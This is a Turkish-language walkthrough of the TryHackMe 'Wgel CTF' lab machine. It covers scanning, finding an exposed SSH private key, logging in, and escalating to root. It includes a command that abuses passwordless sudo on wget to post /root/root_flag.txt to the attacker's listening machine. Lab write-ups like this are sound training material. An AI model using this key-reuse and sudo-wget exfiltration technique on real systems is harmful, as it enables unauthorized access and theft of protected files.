ZAFİYETLİ MAKİNE ÇÖZÜMÜ | TryHackMe Wgel CTF Writeup
https://tryhackme.com/room/wgelctf odanın makine çözümü hakkında bir yazı. İyi çalışmalar.
Oda çözümüne Nmap taraması ile başlayalım.
Yaptığımız tarama sonucunda 22/tcp ssh ve 80/tcp http servislerin açık olduğu görünüyor. Herkese açık olduğu için 80 numaralı bağlantı noktasındaki sunucuya bir göz atalım:
"Jessie web sitesini güncellemeyi unutma." şeklinde bir notla karşılaşıyoruz. Jessie daha sonra kullanabileceğimiz bir kullanıcı adı olabilir.
Kaynak kodundan başka bir şey çıkmadığı için bir de dizin taraması yapalım :
Sitemap adında bir dizin buluyoruz. Bu dizini kontrol ediyoruz ve bir şey çıkmıyor. Tekrar sitemap içinde bir dizin taraması yapalım :
Bu dizini kontrıol edelim:
Bir ssh id_rsa anahtarı bulduk. id_rsa'yı indirip, gerekli izinleri verelim. İzinleri vermek için aşağıdaki komutu kullanabilirsiniz :
- chmod 600 id_rsa
Şimdi bu id_rsa anahtarı ve Web sitesinde bulmuş olduğum kullanıcı adı ile ssh bağlantısı gerçekleştirmeyi deneyelim:
ssh bağlantısını başarılı bir şekilde gerçekleştirdik. Şimdi kullanıcı bayrağını bulalım :
Genellikle bayraklar .txt dosyalarında olur. Bulmak için find komutunu kullanalım.
- find / -type f -name *.txt 2>/dev/null
Bayrağımız Documents dizininin altındaymış. Documents dizinine gidip cat komutuyla bayrağımızı okuyalım.
user_falag.txt içindeki bayrağı bulmuş olduk.
Root bayrağını bulmamız için yetki yükseltmemiz gerekli. Bunun için sudo -l komutu ile root izini verilen komutlara bakalım.
/usr/bin/wget de şifresiz root olabileceğimizi görüyoruz. Bu açığı kullanabiliriz.
İlk olarak ncat ile kendi bilgisayarımızı dinlemeye alalım.
Karşı makineye şu komutu girelim :
- sudo /usr/bin/wget -post-file=/root/root_flag.txt TryHackMe'nin verdiği ip(vpn):dinlenecek por
wget dizinini kullandığımız için bizden şifre istemedi. Dinleme yaptığımız terminale giderek herhangi bir çıktı vermiş mi bakalım.
Ve root bayrağı karşımızda!! Böylelikle odayı tamamlamış olduk İyi çalışmalar...
Tepkiniz nedir?
